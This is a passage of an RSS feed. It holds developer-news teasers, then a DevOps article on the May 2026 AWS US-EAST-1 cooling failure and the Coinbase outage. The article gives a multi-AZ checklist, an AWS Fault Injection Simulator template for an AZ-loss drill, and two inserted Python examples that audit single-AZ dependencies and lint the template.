<p><a href="https://thenewstack.io/cleanup-cost-ai-code/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-github-takes-aim-at-claude-code-and-codex-with-its-new-copilot-app" class="group relative scroll-mt-24">
        <a href="#h3-github-takes-aim-at-claude-code-and-codex-with-its-new-copilot-app" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GitHub takes aim at Claude Code and Codex with its new Copilot app
        </a>
        </h3><p>GitHub’s latest move to shake up its Copilot coding assistant is to give it its very own home in a</p>
<p><strong>📅 May 16, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/github-copilot-desktop-app/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-forward-deployed-engineer-is-ais-hottest-job-as-openai-and-google-race-to-hire-heres-how-to-become-one" class="group relative scroll-mt-24">
        <a href="#h3-forward-deployed-engineer-is-ais-hottest-job-as-openai-and-google-race-to-hire-heres-how-to-become-one" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Forward deployed engineer is AI’s hottest job as OpenAI and Google race to hire. Here’s how to become one.
        </a>
        </h3><p>I’m Matt Burns, Chief Content Officer at Insight Media Group. Each week, I round up the most important AI developments,</p>
<p><strong>📅 May 16, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/forward-deployed-engineer-fde-openai-google/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-why-devops-is-critical-for-modern-business-resilience" class="group relative scroll-mt-24">
        <a href="#h3-why-devops-is-critical-for-modern-business-resilience" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Why DevOps Is Critical for Modern Business Resilience
        </a>
        </h3><p>Today’s business world operates in a state of constant change. What the customer wants to buy changes quickly, new competitors appear overnight, and cyber threats are changing faster than ever. In thi</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/why-devops-is-critical-for-modern-business-resilience/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-pyrefly-lsp-integration-with-type-engine-in-pycharm-202612" class="group relative scroll-mt-24">
        <a href="#h3-pyrefly-lsp-integration-with-type-engine-in-pycharm-202612" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Pyrefly LSP Integration with Type Engine in PyCharm 2026.1.2
        </a>
        </h3><p>In PyCharm 2026.1.2, you can enable Pyrefly as an external type provider, dramatically increasing the speed of the IDE’s code insight features. What is the Pyrefly LSP? “LSP” stands for the Language S</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/pycharm/2026/05/pyrefly-lsp-integration-in-pycharm-2026-1-2"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-intellij-idea-202612-is-out" class="group relative scroll-mt-24">
        <a href="#h3-intellij-idea-202612-is-out" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 IntelliJ IDEA 2026.1.2 Is Out!
        </a>
        </h3><p>IntelliJ IDEA 2026.1.2 has arrived with several valuable fixes. You can update to this version from inside the IDE, using the Toolbox App, or using snaps if you are a Ubuntu user. You can also downloa</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/idea/2026/05/intellij-idea-2026-1-2"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-a-new-default-project-structure-for-kotlin-multiplatform" class="group relative scroll-mt-24">
        <a href="#h3-a-new-default-project-structure-for-kotlin-multiplatform" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 A New Default Project Structure for Kotlin Multiplatform
        </a>
        </h3><p>We are updating the default project structure for Kotlin Multiplatform projects to give modules clearer responsibilities, better align with conventions used by other build systems and frameworks, and </p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/kotlin/2026/05/new-kmp-default-structure"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-help-shape-the-future-of-kotlin-in-the-age-of-ai" class="group relative scroll-mt-24">
        <a href="#h3-help-shape-the-future-of-kotlin-in-the-age-of-ai" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Help Shape the Future of Kotlin in the Age of AI
        </a>
        </h3><p>AI is rapidly changing the way developers write, review, learn, and maintain code. Code completion, AI chat assistants, autonomous coding agents, and other tools are giving rise to new workflows almos</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/kotlin/2026/05/help-shape-the-future-of-kotlin-in-the-age-of-ai"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-xai-enters-the-coding-agent-race-with-grok-build" class="group relative scroll-mt-24">
        <a href="#h3-xai-enters-the-coding-agent-race-with-grok-build" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 xAI Enters the Coding Agent Race With Grok Build
        </a>
        </h3><p>Elon Musk&#39;s xAI has entered the developer workspace with Grok Build, a local-first coding agent featuring an automated &quot;Arena Mode&quot; that runs and ranks parallel AI outputs to rival Anthropic and OpenA</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/xai-enters-the-coding-agent-race-with-grok-build/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-open-source-procurement-agenda-a-guide-for-it-leaders-procurement-teams-and-policymakers" class="group relative scroll-mt-24">
        <a href="#h3-the-open-source-procurement-agenda-a-guide-for-it-leaders-procurement-teams-and-policymakers" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Open Source Procurement Agenda: A Guide for IT Leaders, Procurement Teams and Policymakers
        </a>
        </h3><p>This five-part series from SUSE’s Sovereign Solutions Team, published ahead of the upcoming EU Tech Sovereignty Package, equips IT leaders, procurement professionals, and policymakers with the practic</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 SUSE Blog</strong></p>
<p><a href="https://www.suse.com/c/the-open-source-procurement-agenda-a-guide-for-it-leaders-procurement-teams-and-policymakers/"><strong>🔗 Read more</strong></a></p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[When One Data Center Room Got Hot: AWS US-EAST-1, Coinbase, and the DR Drill That Was Not]]></title>
      <link>https://devops-daily.com/posts/aws-use1-az4-thermal-event-single-az-lessons</link>
      <description><![CDATA[On May 7, 2026, cooling failed in a single hall of one US-EAST-1 data center. Coinbase, FanDuel, and CME Group went down for hours, and Coinbase publicly confirmed their backup systems did not work as expected. Here is what happened, the multi-AZ checklist that would have caught it, and the AWS Fault Injection Simulator commands to run the drill before the next thermal event.]]></description>
      <pubDate>Fri, 15 May 2026 15:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/aws-use1-az4-thermal-event-single-az-lessons</guid>
      <category><![CDATA[AWS]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[AWS]]></category><category><![CDATA[Reliability]]></category><category><![CDATA[Disaster Recovery]]></category><category><![CDATA[Incident Response]]></category><category><![CDATA[Cloud]]></category>
      <content:encoded><![CDATA[<p>At 17:25 PDT on Thursday, May 7, 2026, the cooling in one data center hall inside AWS US-EAST-1 started failing. Temperature climbed. Within minutes, AWS lost power on the affected racks and published the first status update warning that EC2 instances and EBS volumes in <code>use1-az4</code> were impaired. Twenty-plus hours later, at 13:50 PT on May 8, cooling was finally stabilised and most affected resources were recovered.</p>
<p>In between, more than 150 cloud services reported issues. Coinbase&#39;s primary exchange was offline for over five hours during its Q1 earnings day. FanDuel and CME Group both took multi-hour hits to trading. Coinbase&#39;s Head of Platform <a href="https://www.benzinga.com/crypto/26/05/52433912/coinbase-says-aws-cooling-failure-crashed-exchange-during-turbulent-week-ceo-brian-armstrong-calls-it-never-acceptable">stated publicly</a> that the matching engine and Kafka pipeline run pinned to a single AZ to keep latency down, and that the backup systems &quot;did not work as expected during the incident, extending the outage and forcing engineers to manually execute disaster recovery procedures.&quot;</p>
<p>That sentence is the entire post. If you operate anything on AWS that matters, the rest of this article exists to make sure your team is not the one writing that sentence next quarter.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TL;DR
        </a>
        </h2><ul>
<li>A thermal event in <strong>one hall</strong> of <strong>one data center</strong> in <strong>one AZ</strong> (<code>use1-az4</code>) took down core services at Coinbase, FanDuel, and CME Group for hours. None of those companies are small or sloppy.</li>
<li>Multi-AZ is not a checkbox. It is a property you can only verify by killing an AZ on purpose and confirming everything stays up. AWS provides <a href="https://aws.amazon.com/fis/">Fault Injection Simulator (FIS)</a> to do this safely.</li>
<li>Single-AZ-for-latency is sometimes the right call. If you make that call, the cost is a hot standby that an engineer can promote in under five minutes with no thinking, plus a quarterly drill that proves the promotion actually works.</li>
<li>EBS volumes on physically damaged racks are not recoverable. Cross-AZ snapshots are not optional and are not a substitute for a working replica.</li>
<li>Coinbase&#39;s incident is the textbook example of &quot;we had a DR plan, we just had not run it under realistic single-AZ loss.&quot; That gap is the thing to fix this quarter.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        </h2><ul>
<li>An AWS account running anything that handles real money or real users.</li>
<li>Permission to create IAM roles and FIS experiment templates, or the ability to ask someone who does.</li>
<li>Honesty about whether the last successful DR drill actually killed a primary, or just took a snapshot.</li>
</ul>
<h2 id="h2-what-happened-technically" class="group relative scroll-mt-24">
        <a href="#h2-what-happened-technically" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What happened, technically
        </a>
        </h2><p>The official AWS communication during the incident gives the cleanest timeline. AWS first noted the issue at 00:25 UTC on May 8 (<a href="https://www.theregister.com/off-prem/2026/05/08/aws-warns-of-ec2-impairment-as-power-loss-hits-notorious-us-east-1-region/5235509">17:25 PDT May 7</a>). The wording was specific: &quot;EC2 instances and EBS volumes hosted on impacted hardware are affected by the loss of power during the thermal event.&quot; By 01:47 UTC AWS added that &quot;Other AWS services that depend on the affected EC2 instances and EBS volumes in this Availability Zone may also experience impairments,&quot; which is the standard signal that the blast radius is now broader than just compute and block storage.</p>
<p>By 03:06 UTC AWS <a href="https://aws.amazon.com/premiumsupport/technology/pes/">recommended</a> that &quot;customers needing immediate recovery restore from EBS snapshots or launch resources in unaffected zones.&quot; That sentence is the operational tell. AWS was effectively telling the world that recovery in <code>use1-az4</code> was going to take hours and that anyone with a working multi-AZ posture should fail away from it now.</p>
<p>Power was restored progressively, but the EBS volumes on the damaged racks did not all come back. AWS&#39;s status thread for the day used the phrase &quot;subset of EBS volumes will require additional time to recover&quot; for the entire morning of May 8, which in plain English means some volumes were lost to physical damage. The customers who recovered cleanly were the ones whose data plane did not depend on <code>use1-az4</code> at all.</p>
<p>Two technical observations worth pinning to a sticky note:</p>
<ol>
<li><strong>An AZ is not an abstraction.</strong> It is a physical place. When a hall overheats, the racks inside it can be physically damaged. &quot;Multi-AZ&quot; exists because that is the failure mode AWS designs around. The CDR pattern that pretends an AZ is just a logical label is wrong about the world.</li>
<li><strong>The &quot;EBS volumes on damaged hardware&quot; language is the worst-case wording in AWS&#39;s playbook.</strong> It means restore from snapshot, not wait for the volume. If your runbook says &quot;wait for the AZ to come back&quot;, your runbook does not handle this incident.</li>
</ol>
<h2 id="h2-the-coinbase-specifics" class="group relative scroll-mt-24">
        <a href="#h2-the-coinbase-specifics" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The Coinbase specifics
        </a>
        </h2><p><a href="https://www.coindesk.com/business/2026/05/08/coinbase-disruption-tied-to-aws-outage-draws-criticism-amid-staff-layoffs-and-q1-losses">Coinbase&#39;s Head of Platform, Rob Witoff</a>, confirmed three things during the incident:</p>
<ol>
<li>Coinbase&#39;s primary exchange systems run in a <strong>single AZ</strong> to minimise matching-engine latency.</li>
<li>The affected zone hosted parts of the matching engine and the Kafka messaging infrastructure.</li>
<li>Backup systems &quot;did not work as expected during the incident, extending the outage and forcing engineers to manually execute disaster recovery procedures.&quot;</li>
</ol>
<p>None of those choices are dumb on their own. A matching engine at exchange scale is latency-sensitive and there are real reasons to pin it to one AZ. The problem is that single-AZ-for-latency only survives a <code>use1-az4</code> event if the failover into another AZ is a battle-tested one-button operation that an SRE can trigger in the first five minutes of an alert. Coinbase had a backup. The backup did not work. That gap is what cost them five hours.</p>
<p>The pattern is general enough to be worth a name. Call it the <em>&quot;we have a backup&quot;</em> fallacy: the backup exists, but it has never been promoted to primary under real failure conditions, so nobody knows what breaks when it is. The fix is not to write a longer DR doc. The fix is to actually break things on purpose, on a schedule.</p>
<h2 id="h2-the-multi-az-checklist-that-would-have-caught-it" class="group relative scroll-mt-24">
        <a href="#h2-the-multi-az-checklist-that-would-have-caught-it" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The multi-AZ checklist that would have caught it
        </a>
        </h2><p>A surprising amount of AWS multi-AZ is opt-in. Going through the common stack:</p>
<pre><code class="hljs language-text">                                 +---------------+
                                 |   Route 53    |
                                 |  (health      |
                                 |   checks +    |
                                 |   failover)   |
                                 +-------+-------+
                                         |
                       +-----------------+-----------------+
                       |                                   |
                +------v-------+                   +-------v------+
                |   ALB        |                   |   ALB        |
                |  multi-AZ    |                   |  multi-AZ    |
                |  (zone A)    |                   |  (zone B)    |
                +------+-------+                   +-------+------+
                       |                                   |
            +----------+-----------+              +--------+---------+
            |          |           |              |        |         |
       +----v---+ +----v---+  +----v---+    +-----v--+ +---v----+ +--v-----+
       | EC2/   | | EC2/   |  | EC2/   |    | EC2/   | | EC2/   | | EC2/   |
       |  pod   | |  pod   |  |  pod   |    |  pod   | |  pod   | |  pod   |
       +--------+ +--------+  +--------+    +--------+ +--------+ +--------+
            \________/\__________/                \________/\________/
                    az-1                                  az-2

   RDS Multi-AZ standby in az-2.   S3 + DynamoDB global per region.
   Kafka MSK with min.insync.replicas across 3 AZs, acks=all.
   Snapshots replicated to a second region nightly.
</code></pre><p>Concrete checks per service:</p>
<ul>
<li><strong>EC2 + Auto Scaling Groups</strong>: ASG must be configured with all three AZs in the region, with <code>availability_zones</code> explicit. <code>Capacity-Optimized-Prioritized</code> allocation. Run <code>aws autoscaling describe-auto-scaling-groups --query &#39;AutoScalingGroups[].[AutoScalingGroupName,AvailabilityZones]&#39;</code> and confirm every critical ASG lists three AZs.</li>
<li><strong>ALB</strong>: cross-zone load balancing on. The default is off for NLB and on for ALB, which is the opposite of what most operators assume. Verify with <code>aws elbv2 describe-load-balancer-attributes --load-balancer-arn $ARN</code>.</li>
<li><strong>RDS</strong>: <code>MultiAZ: true</code> and the reader endpoint actually used by reads. RDS Multi-AZ failover takes <a href="https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts.MultiAZ.Failover.html">60 to 120 seconds</a>, which is fine for most apps. The trap is apps that hardcode the primary endpoint and never fail over the connection pool.</li>
<li><strong>EKS / Kubernetes</strong>: control plane is AWS-managed across three AZs by default. Worker node groups need explicit <code>subnets</code> covering three AZs. <code>kubectl get nodes -o wide</code> and check the topology label <code>topology.kubernetes.io/zone</code> spans three values. PodDisruptionBudgets + <code>topologySpreadConstraints</code> with <code>maxSkew: 1</code> and <code>topologyKey: topology.kubernetes.io/zone</code> for everything that matters.</li>
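<li><strong>EBS</strong>: cross-AZ availability of snapshots is automatic, because a snapshot is stored regionally and can be restored into any AZ in the region once it has been taken. Cross-region snapshot copies via AWS Backup or DLM are not automatic, and are what saves you if a whole region degrades.</li>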
<li><strong>MSK (managed Kafka)</strong>: 3-broker cluster across 3 AZs, <code>min.insync.replicas=2</code>, producer <code>acks=all</code>. The Coinbase post-incident language (&quot;matching engine and Kafka messaging infrastructure&quot;) suggests this was one of the failure points. A single-AZ Kafka under heavy producer load is the kind of latency-driven choice that bites.</li>
<li><strong>S3 + DynamoDB</strong>: both are regional, not zonal. They survived <code>use1-az4</code> without operator intervention. If your runbook is built on those primitives, your blast radius is already smaller.</li>
</ul>
<p>A surprising number of teams pass every audit on this list because every individual resource is multi-AZ, then fail in production because one shared piece of infrastructure (a self-hosted Redis, a homegrown service-discovery layer, a quotation engine that holds in-memory state) is single-AZ. The audit script you actually want is the one that walks the dependency graph of your most critical user-facing flow and flags every single-AZ node in it.</p>
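<p>A minimal sketch of that audit, added here as an example (not code from the article or from AWS): it walks the dependencies of one flow, flags every component that runs in fewer than two AZs, and lists what goes down if a given AZ is lost. The inventory, component names, and function names are constructed for illustration; in practice the inventory would be built from your own service catalogue.</p>

```python
"""Walk a dependency graph from one user-facing flow and flag single-AZ nodes."""
from collections import deque

# Constructed inventory. "azs" lists the AZ IDs a component runs in;
# "regional": True marks regional services (S3, DynamoDB in the article).
INVENTORY = {
    "checkout-api":  {"azs": ["use1-az1", "use1-az2", "use1-az4"],
                      "deps": ["orders-db", "session-redis", "quote-engine"]},
    "orders-db":     {"azs": ["use1-az1", "use1-az2"], "deps": ["s3-archive"]},
    "session-redis": {"azs": ["use1-az4"], "deps": []},
    # Depends back on checkout-api on purpose: the walk must survive cycles.
    "quote-engine":  {"azs": ["use1-az4"], "deps": ["kafka", "checkout-api"]},
    "kafka":         {"azs": ["use1-az1", "use1-az2", "use1-az4"], "deps": []},
    "s3-archive":    {"regional": True, "deps": []},
    "batch-reports": {"azs": ["use1-az4"], "deps": []},  # not on the checkout path
}


def deps_of(inventory, node):
    """Dependencies of a node; a node missing from the inventory has none."""
    return inventory.get(node, {}).get("deps", [])


def reachable(inventory, entry):
    """Breadth-first walk from entry. Returns {node: shortest path from entry}."""
    paths = {entry: [entry]}
    queue = deque([entry])
    while queue:
        node = queue.popleft()
        for dep in deps_of(inventory, node):
            if dep not in paths:  # visited check keeps cycles from looping
                paths[dep] = paths[node] + [dep]
                queue.append(dep)
    return paths


def zones_of(inventory, node):
    """Set of AZ IDs, None for a regional service, empty set if unknown."""
    spec = inventory.get(node)
    if spec is None:
        return set()
    if spec.get("regional"):
        return None
    return set(spec.get("azs", []))


def single_az_findings(inventory, entry):
    """Every node on the flow that runs in fewer than two AZs, with its path."""
    findings = []
    for node, path in reachable(inventory, entry).items():
        zones = zones_of(inventory, node)
        if zones is None or len(zones) >= 2:
            continue
        if node not in inventory:
            reason = "missing from inventory"
        elif not zones:
            reason = "no AZ recorded"
        else:
            reason = "single AZ: " + next(iter(zones))
        findings.append({"node": node, "reason": reason, "path": " -> ".join(path)})
    return sorted(findings, key=lambda f: f["node"])


def failed_on_az_loss(inventory, entry, lost_az):
    """Nodes on the flow that fail if lost_az disappears (all deps treated as hard)."""
    nodes = reachable(inventory, entry)
    failed = set()
    for node in nodes:
        zones = zones_of(inventory, node)
        if zones is not None and not (zones - {lost_az}):
            failed.add(node)  # nothing left outside the lost AZ
    changed = True
    while changed:  # propagate failures upstream until nothing changes
        changed = False
        for node in nodes:
            if node not in failed and any(d in failed for d in deps_of(inventory, node)):
                failed.add(node)
                changed = True
    return sorted(failed)


if __name__ == "__main__":
    for finding in single_az_findings(INVENTORY, "checkout-api"):
        print(f'{finding["node"]}: {finding["reason"]} via {finding["path"]}')
    print("down if use1-az4 is lost:", failed_on_az_loss(INVENTORY, "checkout-api", "use1-az4"))
```

<p>Every resource in this sample would pass a per-resource check except the two single-AZ components, yet losing <code>use1-az4</code> takes the entry point down with them because the dependencies are hard.</p>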
<h2 id="h2-the-drill-that-proves-the-checklist" class="group relative scroll-mt-24">
        <a href="#h2-the-drill-that-proves-the-checklist" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The drill that proves the checklist
        </a>
        </h2><p>The checklist above is necessary. It is not sufficient. The only thing that proves multi-AZ works is killing an AZ on purpose and watching the dashboard.</p>
<p>AWS Fault Injection Simulator (FIS) is the tool. The shape of a &quot;kill an AZ&quot; experiment template:</p>
<pre><code class="hljs language-json"><span class="hljs-punctuation">{</span>
  <span class="hljs-attr">&quot;description&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;Simulate loss of use1-az4 EC2 capacity&quot;</span><span class="hljs-punctuation">,</span>
  <span class="hljs-attr">&quot;roleArn&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;arn:aws:iam::123456789012:role/FISExperimentRole&quot;</span><span class="hljs-punctuation">,</span>
  <span class="hljs-attr">&quot;stopConditions&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">[</span>
    <span class="hljs-punctuation">{</span>
      <span class="hljs-attr">&quot;source&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;aws:cloudwatch:alarm&quot;</span><span class="hljs-punctuation">,</span>
      <span class="hljs-attr">&quot;value&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;arn:aws:cloudwatch:us-east-1:123456789012:alarm:UserErrorRateHigh&quot;</span>
    <span class="hljs-punctuation">}</span>
  <span class="hljs-punctuation">]</span><span class="hljs-punctuation">,</span>
  <span class="hljs-attr">&quot;targets&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">{</span>
    <span class="hljs-attr">&quot;EC2Instances-AZ4&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">{</span>
      <span class="hljs-attr">&quot;resourceType&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;aws:ec2:instance&quot;</span><span class="hljs-punctuation">,</span>
      <span class="hljs-attr">&quot;selectionMode&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;ALL&quot;</span><span class="hljs-punctuation">,</span>
      <span class="hljs-attr">&quot;filters&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">[</span>
        <span class="hljs-punctuation">{</span>
          <span class="hljs-attr">&quot;path&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;Placement.AvailabilityZone&quot;</span><span class="hljs-punctuation">,</span>
          <span class="hljs-attr">&quot;values&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">[</span><span class="hljs-string">&quot;use1-az4&quot;</span><span class="hljs-punctuation">]</span>
        <span class="hljs-punctuation">}</span><span class="hljs-punctuation">,</span>
        <span class="hljs-punctuation">{</span>
          <span class="hljs-attr">&quot;path&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;State.Name&quot;</span><span class="hljs-punctuation">,</span>
          <span class="hljs-attr">&quot;values&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">[</span><span class="hljs-string">&quot;running&quot;</span><span class="hljs-punctuation">]</span>
        <span class="hljs-punctuation">}</span>
      <span class="hljs-punctuation">]</span>
    <span class="hljs-punctuation">}</span>
  <span class="hljs-punctuation">}</span><span class="hljs-punctuation">,</span>
  <span class="hljs-attr">&quot;actions&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">{</span>
    <span class="hljs-attr">&quot;StopAZ4Instances&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">{</span>
      <span class="hljs-attr">&quot;actionId&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;aws:ec2:stop-instances&quot;</span><span class="hljs-punctuation">,</span>
      <span class="hljs-attr">&quot;parameters&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">{</span> <span class="hljs-attr">&quot;startInstancesAfterDuration&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;PT30M&quot;</span> <span class="hljs-punctuation">}</span><span class="hljs-punctuation">,</span>
      <span class="hljs-attr">&quot;targets&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">{</span> <span class="hljs-attr">&quot;Instances&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;EC2Instances-AZ4&quot;</span> <span class="hljs-punctuation">}</span>
    <span class="hljs-punctuation">}</span>
  <span class="hljs-punctuation">}</span><span class="hljs-punctuation">,</span>
  <span class="hljs-attr">&quot;tags&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">{</span> <span class="hljs-attr">&quot;Name&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;kill-az4-30min&quot;</span> <span class="hljs-punctuation">}</span>
<span class="hljs-punctuation">}</span>
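</code></pre><p>The pattern that matters is the <strong>stop condition tied to a real customer-impact alarm</strong>. The experiment kills every EC2 instance in <code>use1-az4</code> for 30 minutes, but if the user-facing error rate alarm fires (because failover did not work), FIS aborts the experiment and the instances come back. That is the lock that lets you run this in production without ending your career.</p>
<p>One caveat on the target filter: <code>Placement.AvailabilityZone</code> is matched against the zone name (for example <code>us-east-1a</code>), not the zone ID, and the name that maps to <code>use1-az4</code> differs from account to account. Replace the filter value with the zone name your account uses for <code>use1-az4</code>, otherwise the target resolves to no instances.</p>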
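<p>A pre-flight check for the template above, added here as an example (not code from the article or from AWS): it confirms a CloudWatch alarm stop condition is present, flags a zone ID used where the filter expects a zone name, and can rewrite the filter from a zone mapping. The mapping is constructed sample data standing in for <code>aws ec2 describe-availability-zones</code> output, and the function names and finding codes are hypothetical.</p>

```python
"""Lint an FIS experiment template before running an AZ-loss drill."""
import copy
import re

AZ_ID_RE = re.compile(r"^[a-z]{2,6}\d-az\d+$")  # zone IDs look like use1-az4

# Constructed mapping for one account; real mappings differ per account.
ZONES_OUTPUT = {"AvailabilityZones": [
    {"ZoneName": "us-east-1a", "ZoneId": "use1-az2"},
    {"ZoneName": "us-east-1b", "ZoneId": "use1-az4"},
    {"ZoneName": "us-east-1c", "ZoneId": "use1-az6"},
]}

# The article's template, as a Python dict (tags omitted).
TEMPLATE = {
    "description": "Simulate loss of use1-az4 EC2 capacity",
    "roleArn": "arn:aws:iam::123456789012:role/FISExperimentRole",
    "stopConditions": [{
        "source": "aws:cloudwatch:alarm",
        "value": "arn:aws:cloudwatch:us-east-1:123456789012:alarm:UserErrorRateHigh",
    }],
    "targets": {"EC2Instances-AZ4": {
        "resourceType": "aws:ec2:instance",
        "selectionMode": "ALL",
        "filters": [
            {"path": "Placement.AvailabilityZone", "values": ["use1-az4"]},
            {"path": "State.Name", "values": ["running"]},
        ],
    }},
    "actions": {"StopAZ4Instances": {
        "actionId": "aws:ec2:stop-instances",
        "parameters": {"startInstancesAfterDuration": "PT30M"},
        "targets": {"Instances": "EC2Instances-AZ4"},
    }},
}


def zone_names_by_id(zones_output):
    """Map zone ID to zone name for the account the output came from."""
    return {z["ZoneId"]: z["ZoneName"] for z in zones_output["AvailabilityZones"]}


def az_filters(template):
    """Yield every target filter that matches on Placement.AvailabilityZone."""
    for target in template.get("targets", {}).values():
        for flt in target.get("filters", []):
            if flt.get("path") == "Placement.AvailabilityZone":
                yield flt


def lint(template, zones_output):
    """Return a list of (code, message) findings; empty means ready to run."""
    names = zone_names_by_id(zones_output)
    findings = []
    alarms = [c for c in template.get("stopConditions", [])
              if c.get("source") == "aws:cloudwatch:alarm" and c.get("value")]
    if not alarms:
        findings.append(("NO_ALARM_STOP_CONDITION",
                         "nothing aborts the experiment on customer impact"))
    for flt in az_filters(template):
        for value in flt.get("values", []):
            if AZ_ID_RE.match(value):
                hint = names.get(value, "unknown in this account")
                findings.append(("AZ_ID_IN_NAME_FILTER",
                                 f"{value} is a zone ID; zone name here: {hint}"))
    for name, action in template.get("actions", {}).items():
        for target in action.get("targets", {}).values():
            if target not in template.get("targets", {}):
                findings.append(("UNKNOWN_TARGET", f"{name} references {target}"))
        if (action.get("actionId") == "aws:ec2:stop-instances"
                and "startInstancesAfterDuration" not in action.get("parameters", {})):
            findings.append(("STOP_WITHOUT_RESTART",
                             f"{name} has no startInstancesAfterDuration"))
    return findings


def resolve_zone_ids(template, zones_output):
    """Return a copy of the template with zone IDs replaced by zone names."""
    names = zone_names_by_id(zones_output)
    fixed = copy.deepcopy(template)
    for flt in az_filters(fixed):
        flt["values"] = [names.get(v, v) if AZ_ID_RE.match(v) else v
                         for v in flt["values"]]
    return fixed


if __name__ == "__main__":
    for code, message in lint(TEMPLATE, ZONES_OUTPUT):
        print(code, "-", message)
    print("after resolving:", lint(resolve_zone_ids(TEMPLATE, ZONES_OUTPUT), ZONES_OUTPUT))
```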
<p>Run it on a quarterly cadence. The first time, run it in staging at 09:00 on a Tuesday with the on-call team watching. The second time, run it in production at the same time. By the third time, run it on a Friday afternoon with nobody told in advance. If anything breaks at that point, you have found the thing that would have broken during the next thermal event, and you have found it with a stop-condition you control.</p>
<p>A few additional FIS actions worth chaining into the same template once the basic AZ kill is solid:</p>
<ul>
<li><code>aws:ec2:terminate-instances</code> instead of <code>stop-instances</code> for a more aggressive version that does not allow recovery without replacement.</li>
<li><code>aws:network:disrupt-connectivity</code> with scope <code>availability-zone</code> to simulate the network-partition variant.</li>
<li><code>aws:eks:pod-cpu-stress</code> to layer in worker-node pressure during the AZ failure.</li>
<li><code>aws:rds:failover-db-cluster</code> to deliberately fail an Aurora primary at the same moment.</li>
</ul>
<p>The most realistic single-AZ-failure drill is the one that combines AZ-level EC2 loss with RDS primary failover and 50% packet loss to S3, because that is closer to what happens during an actual hall-overheat event than any single FIS action on its own.</p>
<h2 id="h2-the-single-az-for-latency-exception" class="group relative scroll-mt-24">
